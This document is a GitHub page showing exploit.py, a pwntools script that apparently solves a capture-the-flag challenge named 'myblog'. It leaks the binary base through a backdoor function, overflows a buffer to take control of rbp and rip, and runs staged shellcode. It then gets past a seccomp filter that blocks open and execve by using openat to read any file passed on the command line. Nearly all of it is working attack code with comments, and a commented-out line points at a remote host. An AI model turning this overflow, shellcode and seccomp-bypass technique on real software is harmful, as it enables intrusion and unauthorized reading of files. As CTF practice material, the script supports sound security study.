-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathexploit.py
122 lines (101 loc) · 2.9 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
import pwn
import sys
pwn.context.arch = 'amd64'
r = pwn.process("./myblog")
#pwn.gdb.attach(r, "b read\n\n")
#r = pwn.remote("159.65.125.233", 31337)
"""
Any operation will end in exit
Hidden backdor function with id 1337
Will leak address of backdor function
=> conpute binary base
"""
#backdoor leak
r.sendline("31337")
r.recvuntil("I will give you a gift 0x")
blog_base_ptr = int(r.read(12), 16) - 3828
print "Binary base: 0x%x" % (blog_base_ptr)
"""
Additionally 16 byte overflow => rip&rbp control
rip offset in binary musst be greater than 0xfff
We cann use calls in menu to call function e.g. show owner
vmmap show rwx section
Owner is stored there
Ptr to section is stored in .bss segment
Point rbp such exit will jump to rwx segment
"""
call_show_owner = blog_base_ptr + 0x10c2
rwx_ptr = blog_base_ptr + 0x202048
payload = "AAAAAAAA"
payload += pwn.p64(rwx_ptr-8) #rbp
payload += pwn.p64(call_show_owner) #rip
r.send(payload)
print r.recvuntil("Done!!")
"""
Author is stored in rwx section
We can execute 7 bytes
rax = 0x00 & rdi = random pointer
Make rsi point to rwx segment and execute syscall
Will overwrite rwx section with arbitrary long shellcode
"""
#execute buffer
shellcode = "sub rsp,8; pop rsi; syscall"
shellcode = pwn.asm(shellcode)
r.send(shellcode)
print r.recvuntil("Done!!")
#do exit
r.send("4")
print r.recvuntil("ByeBye")
"""
programm uses seccomp
[...]
prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) = 0
prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, {len=11, filter=0x7ffefe130eb0}) = 0
[...]
https://github.com/david942j/seccomp-tools
seccomp-tools dump ./myblog
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x08 0xc000003e if (A != ARCH_X86_64) goto 0010
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x35 0x06 0x00 0x40000000 if (A >= 0x40000000) goto 0010
0004: 0x15 0x05 0x00 0x00000002 if (A == open) goto 0010
0005: 0x15 0x04 0x00 0x0000003b if (A == execve) goto 0010
0006: 0x15 0x03 0x00 0x00000039 if (A == fork) goto 0010
0007: 0x15 0x02 0x00 0x0000003a if (A == vfork) goto 0010
0008: 0x15 0x01 0x00 0x00000038 if (A == clone) goto 0010
0009: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0010: 0x06 0x00 0x00 0x00000000 return KILL
execve and open are blocked
open_at is allowed (open file in subdirectory)
directory descriptor is ignored if filepath is absolute
"""
#second stage shellcode using sys_openat
#use jmp call trick to get string pointer in rsi
#read 1024 bytes and write to stdout
readfile = """
jmp str;
ret:
pop rsi;
xor rdi, rdi;
xor rdx, rdx;
xor r10, r10;
mov eax, 257;
syscall
mov rdi, rax;
mov rsi, rsp;
mov rdx, 1024;
mov eax, 0;
syscall;
mov rdi, 1;
mov eax, 1;
syscall;
mov eax, 60;
syscall
str:
call ret
.string "%s"
""" % sys.argv[1]
readfile = pwn.asm(readfile)
r.sendline("A" * 7 + readfile) #7bytes are already executed
#read flag
print r.recvall().replace("\x00", "")